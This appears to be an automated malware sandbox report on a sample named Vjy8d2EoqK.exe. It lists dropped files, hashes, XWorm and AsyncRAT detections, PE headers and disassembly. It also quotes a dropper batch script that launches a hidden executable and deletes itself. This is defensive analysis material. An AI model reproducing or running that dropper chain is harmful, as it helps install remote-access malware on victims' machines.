                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Brokercrt\comReviewsession.exe
                                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):205
                                                                    Entropy (8bit):5.269217844708175
                                                                    Encrypted:false
                                                                    SSDEEP:6:hITg3Nou11r+DE1R1cz/0UbKOZG1wkn23f7Jhn:OTg9YDES8CfjJh
                                                                    MD5:8275BA463F0F42ECA5BC626F441D782D
                                                                    SHA1:EADABA4B34E43B5515389EFAA7FBFE845BC1D5AE
                                                                    SHA-256:AAF901C3EC493F986332BB8C0A7FE5CC12EEE49C0C280B2996532D09EBC98405
                                                                    SHA-512:75C647AF690197161FDF186DF29E7A938A5AAC97AF01C87D4243D501E56BE9164912B14C5F925FDE4E184D662A7A99902D602C295CFD5DBE76D6DE14CA8A3F61
                                                                    Malicious:false
                                                                    Preview:@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\greTr4XoY3.bat"
                                                                    Process:C:\Users\user\Desktop\Vjy8d2EoqK.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1164420
                                                                    Entropy (8bit):6.3700733509127065
                                                                    Encrypted:false
                                                                    SSDEEP:24576:u2G/nvxW3WieCN4Q+UeeN4uJi7rOu+dwd/1vJjFiZkkd:ubA3jN4Q+bexidYawZky
                                                                    MD5:91F72031C3AD088797D77357FA39DB39
                                                                    SHA1:3239E0D975F52025B55B5BF4A6BFBE2C22B31263
                                                                    SHA-256:2233052384366ACB09B963B34F8C6DD27EE4C7799F60E553E7D0B70D6C46E85B
                                                                    SHA-512:8F2826A4AA5AD5355E7371A8B0641B7D8F1620C8204108077064B922381A551BF31E2491A01A47E2626CEB4D3E1809F5FD6ECC24D086F7B422A54291AB31B84C
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 79%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'...Rich&...................PE..L....._............................@........0....@..........................@............@......................... ...4...T...<....0..........................h"......T............................U..@............0..`...... ....................text............................... ..`.rdata.......0......................@..@.data...(7..........................@....didat....... ......................@....rsrc........0......................@..@.reloc..h".......$..................@..B........................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\AppData\Local\Temp\XClient.exe
                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 5 11:32:41 2024, mtime=Mon Aug 5 11:32:41 2024, atime=Mon Aug 5 11:32:41 2024, length=54784, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):764
                                                                    Entropy (8bit):5.03576809524861
                                                                    Encrypted:false
                                                                    SSDEEP:12:8wn24jWCF7dY//cE6cEL2SeijAsl5rHkUa/MBmV:8qyG7+0E6cm2SeeAsl5YUa/MBm
                                                                    MD5:C9147CFA1C06A5F728D6B9C87849E3D5
                                                                    SHA1:172CBF4529D58F541F43A9932AACD4F2A6302C16
                                                                    SHA-256:F9A32324CF19997A6513E55FCC31D6DE4D5C05A494B27155364A33C8C8299A40
                                                                    SHA-512:34A7D302CC3C93440B471FFD9535A2B6D83CB13030A4951D395597408E6687192BB767CDCA18983FEF2F3C0A84386E75E50AE1BCD98E2D611E42E75E9C53BAF1
                                                                    Malicious:false
                                                                    Preview:L..................F.... ....CQ.3....CQ.3....CQ.3...........................v.:..DG..Yr?.D..U..k0.&...&......vk.v.....?Kt3....~.3.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.d...........................%..A.p.p.D.a.t.a...B.V.1......Y.c..Roaming.@......CW.^.Y.c...........................#..R.o.a.m.i.n.g.....b.2......Y.d .XClient.exe.H.......Y.d.Y.d..............................X.C.l.i.e.n.t...e.x.e.......Y...............-.......X...........@........C:\Users\user\AppData\Roaming\XClient.exe........\.....\.....\.....\.....\.X.C.l.i.e.n.t...e.x.e.`.......X.......927537...........hT..CrF.f4... ...a.&S...,.......hT..CrF.f4... ...a.&S...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                    Process:C:\Users\user\AppData\Local\Temp\XClient.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):54784
                                                                    Entropy (8bit):5.865893416493186
                                                                    Encrypted:false
                                                                    SSDEEP:1536:ABCSePghTBz+uO9S+bUwga3HX6l+OZ1aSC:Acgh1zF+bUiHlOZ1lC
                                                                    MD5:BF19D4A22F47EEA6DD1DB1C98A5AAC07
                                                                    SHA1:384506BF1E83DF03D48CDC59E7EFB03D8087D3C5
                                                                    SHA-256:A7F98D3361874AC82332FBB9CDED7BE12EF8CB6699305351E27247A2B464272C
                                                                    SHA-512:C8C6FAB16E60FAB5BEB5B209C8FB5446D7E9B46E40EB575D0D8004A634578831DDE56C257B6621E4382C9AB674FDEC005F903DF84A4A4E7A32A952ACE92980AE
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security
                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: ditekSHen
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 92%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....H.f............................>.... ........@.. .......................@............@.....................................O............................ ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................ .......H.......<`..........&.....................................................(....*.r...p*. ~.H.*..(....*.ro..p*. .O..*.s.........s.........s.........s.........*.r...p*. h.:.*.r...p*. .x!.*.r...p*. ..[.*.r...p*. ..?.*.r...p*. &...*..((...*.r...p*. .s..*.r7..p*"(....+.*&(....&+.*.+5sZ... .... .'..o[...(,...~....-.(G...(9...~....o\...&.-.*.r...p*. S...*.r9..p*.rW..p*. .(T.*.ru..p*. .._.*.r...p*.r...p*. .0..*..............j..................s]..............~.........*"(I...+.*:.t..
                                                                    Process:C:\Brokercrt\comReviewsession.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):64
                                                                    Entropy (8bit):4.960479296672176
                                                                    Encrypted:false
                                                                    SSDEEP:3:Q7vmuP2WWQvKQZjpSUzij/d2n:Q7vmuP2WxvKkVSMu/0
                                                                    MD5:4E349D72EA8A52B14156E32443935C72
                                                                    SHA1:12A4B8A78E9463289FFEBE76B2784DA618DE7CC0
                                                                    SHA-256:75950BFDB8EF32D5AD1C25A931EFC718A89711D50FD98C8FE956725DC22C59D8
                                                                    SHA-512:05405AB9E211E1C123A0878F2BCDE5B534C30F541BF158CD4960B8CCA50F6C9B3C85AB9804C26792791C31A389ED1FC7860FC3BD977A29C53B153170AF1F4C12
                                                                    Malicious:false
                                                                    Preview:NsvcwdXhsSgfxKN4LwnsRXAGvFVSjZSRst0rCoYd4sIFLYVT1BVGyYv0sorrIE8S
                                                                    Process:C:\Brokercrt\comReviewsession.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):847360
                                                                    Entropy (8bit):6.0749660749943555
                                                                    Encrypted:false
                                                                    SSDEEP:12288:V4a2i+Ux0eV34uU8CCi7rOrod+d6ZyMcKYKHV1vJUWpFijlkk:V4Q+UeeN4uJi7rOu+dwd/1vJjFiZkk
                                                                    MD5:24DAFEB85B4C72D29606ADF2A59DA04C
                                                                    SHA1:82903E26C42111B5CBC0214BCD710B487B6C4B21
                                                                    SHA-256:0EC6A4A4D08B835BFBD7A9FC1AC6C4D5DF57CD34F69100BFF12BAD050B8D6773
                                                                    SHA-512:6B039748EBB5CC5EA0F35940D1B4929E1CD23E65AD23EE1F7106B5679434FE148E533F6D36900ED33FC7B09BBDB1F441CFAFB75D58BD49A9651C794ED60A2136
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Brokercrt\comReviewsession.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):847360
                                                                    Entropy (8bit):6.0749660749943555
                                                                    Encrypted:false
                                                                    SSDEEP:12288:V4a2i+Ux0eV34uU8CCi7rOrod+d6ZyMcKYKHV1vJUWpFijlkk:V4Q+UeeN4uJi7rOu+dwd/1vJjFiZkk
                                                                    MD5:24DAFEB85B4C72D29606ADF2A59DA04C
                                                                    SHA1:82903E26C42111B5CBC0214BCD710B487B6C4B21
                                                                    SHA-256:0EC6A4A4D08B835BFBD7A9FC1AC6C4D5DF57CD34F69100BFF12BAD050B8D6773
                                                                    SHA-512:6B039748EBB5CC5EA0F35940D1B4929E1CD23E65AD23EE1F7106B5679434FE148E533F6D36900ED33FC7B09BBDB1F441CFAFB75D58BD49A9651C794ED60A2136
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Brokercrt\comReviewsession.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):144
                                                                    Entropy (8bit):5.600296272715302
                                                                    Encrypted:false
                                                                    SSDEEP:3:qmGLBvfmUPO8WsCRunyLORhvRhumCsNsvYVeX/Nju1eDtiXYSW:qmGleWO8s/LOHvRhujs+vYIXFju1cQXe
                                                                    MD5:7679E77AE1B44A90B12355E2491E3A2E
                                                                    SHA1:B194B382A1439F64A987D69FBBB4CD7CD0AF7B19
                                                                    SHA-256:6634D4C83E5E51BCB066EA22FDFB256D88F6A18AFE5F7453964C365F0EEB4857
                                                                    SHA-512:AFC557446CEA76A5A9B920686BB4C1CF47F5E7A76B7AF2FC25CBD8DDE5602762935614854461D4BD303B37E4B2B032EFCEA440D637E8A41EA138F07A82BD3485
                                                                    Malicious:false
                                                                    Preview:QvC6qNnZdnmWQ7IfR7NwOcN1jCm8uadU6pEFMUyTdLMTguKs3kmYxJ4xhLWnkooDJRak3CT7J4TCQ4Vy24EKyFhxvQhB7KsyhIJOUjy0RoP2z2hn0ivqjePEunznfSA8MffHuGeSFO2J0o73
                                                                    Process:C:\Brokercrt\comReviewsession.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):292
                                                                    Entropy (8bit):5.804137514149156
                                                                    Encrypted:false
                                                                    SSDEEP:6:xMtWyAjhRdMLeIUXmwR7I7GcuOdsxSJAJDppzWvc41WCunZ3n:+tWyM3KlqW6cuLSJ+NpqE41WlnZ3n
                                                                    MD5:8C543C451B39F82D836D24CB2584070B
                                                                    SHA1:0A7AFCAE0E33C882DAF194A3F20A2ED5BDB6C213
                                                                    SHA-256:26F2C39D7924A17F14E0326161165C61208BB5FF505E7FE838429A96DDCB7565
                                                                    SHA-512:21F8C6DE057E4898760FEC088CDBB6B290ADA809529BACEF26353244865FAE80F9BA96B88484A025015A40B04AA302CCCD2A88300EA496BB0279AEEEEE893E26
                                                                    Malicious:false
                                                                    Preview:t2CqgD4KOGQ4rcsjnHCZklpPntXBawNvtlJBc3bjlJwUECtasNOR9ZrIMxDwq3tc3fKFTqHupcxayVKkA6SNi6vU4Ayp0p2sZUbj1nGCGelglQT1mcvukg36tzLS1b49jEBe3ksWzQGEUPsnr7CX3IH3ae0BcyKojm6gPy7BtZ4UZzldHhl4ZgGb7IEYuq4BFcesSLY2AAneNwdk3W45MPPDffjGuiRCe3O7V3L5It4Y2lNKodfXw8z0NaMwmRHbtl9UhgP9K9wcV0K4RYbQC4QgDYu4qYS1lcpR
                                                                    Process:C:\Brokercrt\comReviewsession.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):847360
                                                                    Entropy (8bit):6.0749660749943555
                                                                    Encrypted:false
                                                                    SSDEEP:12288:V4a2i+Ux0eV34uU8CCi7rOrod+d6ZyMcKYKHV1vJUWpFijlkk:V4Q+UeeN4uJi7rOu+dwd/1vJjFiZkk
                                                                    MD5:24DAFEB85B4C72D29606ADF2A59DA04C
                                                                    SHA1:82903E26C42111B5CBC0214BCD710B487B6C4B21
                                                                    SHA-256:0EC6A4A4D08B835BFBD7A9FC1AC6C4D5DF57CD34F69100BFF12BAD050B8D6773
                                                                    SHA-512:6B039748EBB5CC5EA0F35940D1B4929E1CD23E65AD23EE1F7106B5679434FE148E533F6D36900ED33FC7B09BBDB1F441CFAFB75D58BD49A9651C794ED60A2136
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                                    File Type:ASCII text, with CRLF, LF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1776
                                                                    Entropy (8bit):3.5480492848009324
                                                                    Encrypted:false
                                                                    SSDEEP:24:AHq6saJQXQK6zkp5nFC3xtKEcfyNodeI5nFC3udee:6s/Xv6zklC3aEoy+de2C3udee
                                                                    MD5:7264ED58A430BF80CED4FE4977A81ABE
                                                                    SHA1:AC73A7FC9C993F27494651FD56FC9289F5C54F03
                                                                    SHA-256:3BECF43647028907B5DF24E41012AD21AD4CBFC3DC639C73BA7219B5241EE269
                                                                    SHA-512:688723E77658A9032D807BF8FBA514B246EA2B7A9E371BA1F6C7DF2BAF4DBA831AED5586CA149AE29C85427EF1592238E9516BD309D47B328D65D73D75DF9C33
                                                                    Malicious:false
                                                                    Preview: ,gg, .. i8""8i ,dPYb, .. `8,,8' IP'`Yb .. `88' I8 8I .. dP"8, I8 8' .. dP' `8a ,ggggg, I8 dP ,gggg,gg ,gggggg, ,gggg,gg .. dP' `Yb dP" "Y8gggI8dP dP" "Y8I dP""""8I dP" "Y8I .._ ,dP' I8 i8' ,8I I8P i8' ,8I ,8' 8I i8' ,8I .."888,,____,dP,d8, ,d8' ,d8b,_ ,d8, ,d8b,,dP Y8,,d8, ,d8b,..a8P"Y88888P" P"Y8888P" 8P'"Y88P"Y8888P"`Y88P `Y8P"Y8888P"`Y8.. .. .. .. ..
                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):7.880492453213229
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                    • InstallShield setup (43055/19) 0.21%
                                                                    • Win32 Executable Delphi generic (14689/80) 0.07%
                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                    File name:Vjy8d2EoqK.exe
                                                                    File size:8'422'912 bytes
                                                                    MD5:a0936899fbf31493bbe5e34dc18a9341
                                                                    SHA1:1634a9e1759962db670bf244b1b3f5a9e71a25d7
                                                                    SHA256:b27cdbd5705c56034999011911997559d5eecb66e2e0d8b8c9aa843fe05d1627
                                                                    SHA512:1916ca8eda84abec46cc6a932d350b5baeaa7b46876c6788f670d418157dcc3e18c73fe884100489b6b294e37e899c39442485ee1de2cd1f4b12ef8793f5e562
                                                                    SSDEEP:98304:ppzdbM+Q2y+aq02EPzxjOjFgFQlwq4Mjk+dBZtu9xTtwz/aer6/BbiEJ1nL2hBnI:pDf07JOjmFQR4MVGFtwLPsnL2hVGBZ
                                                                    TLSH:138612017F408EA1F0195677C1DF82048B74A9112BA6D71FBAA9337D5A233937C1EADB
                                                                    File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                    Icon Hash:90cececece8e8eb0
                                                                    Entrypoint:0x4020cc
                                                                    Entrypoint Section:CODE
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                    DLL Characteristics:
                                                                    Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:d59a4a699610169663a929d37c90be43
                                                                    Instruction
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    mov ecx, 0000000Ch
                                                                    push 00000000h
                                                                    push 00000000h
                                                                    dec ecx
                                                                    jne 00007F5C20B4E8FBh
                                                                    push ecx
                                                                    push ebx
                                                                    push esi
                                                                    push edi
                                                                    mov eax, 0040209Ch
                                                                    call 00007F5C20B4E370h
                                                                    xor eax, eax
                                                                    push ebp
                                                                    push 00402361h
                                                                    push dword ptr fs:[eax]
                                                                    mov dword ptr fs:[eax], esp
                                                                    lea edx, dword ptr [ebp-14h]
                                                                    mov eax, 00402378h
                                                                    call 00007F5C20B4E749h
                                                                    mov eax, dword ptr [ebp-14h]
                                                                    call 00007F5C20B4E819h
                                                                    mov edi, eax
                                                                    test edi, edi
                                                                    jng 00007F5C20B4EB36h
                                                                    mov ebx, 00000001h
                                                                    lea edx, dword ptr [ebp-20h]
                                                                    mov eax, ebx
                                                                    call 00007F5C20B4E7D8h
                                                                    mov ecx, dword ptr [ebp-20h]
                                                                    lea eax, dword ptr [ebp-1Ch]
                                                                    mov edx, 00402384h
                                                                    call 00007F5C20B4DF68h
                                                                    mov eax, dword ptr [ebp-1Ch]
                                                                    lea edx, dword ptr [ebp-18h]
                                                                    call 00007F5C20B4E70Dh
                                                                    mov edx, dword ptr [ebp-18h]
                                                                    mov eax, 00404680h
                                                                    call 00007F5C20B4DE40h
                                                                    lea edx, dword ptr [ebp-2Ch]
                                                                    mov eax, ebx
                                                                    call 00007F5C20B4E7A6h
                                                                    mov ecx, dword ptr [ebp-2Ch]
                                                                    lea eax, dword ptr [ebp-28h]
                                                                    mov edx, 00402390h
                                                                    call 00007F5C20B4DF36h
                                                                    mov eax, dword ptr [ebp-28h]
                                                                    lea edx, dword ptr [ebp-24h]
                                                                    call 00007F5C20B4E6DBh
                                                                    mov edx, dword ptr [ebp-24h]
                                                                    mov eax, 00404684h
                                                                    call 00007F5C20B4DE0Eh
                                                                    lea edx, dword ptr [ebp-38h]
                                                                    mov eax, ebx
                                                                    call 00007F5C20B4E774h
                                                                    mov ecx, dword ptr [ebp-38h]
                                                                    lea eax, dword ptr [ebp-34h]
                                                                    mov edx, 0040239Ch
                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x50000x302.idata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x90000x8063a8.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x80000x1c8.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
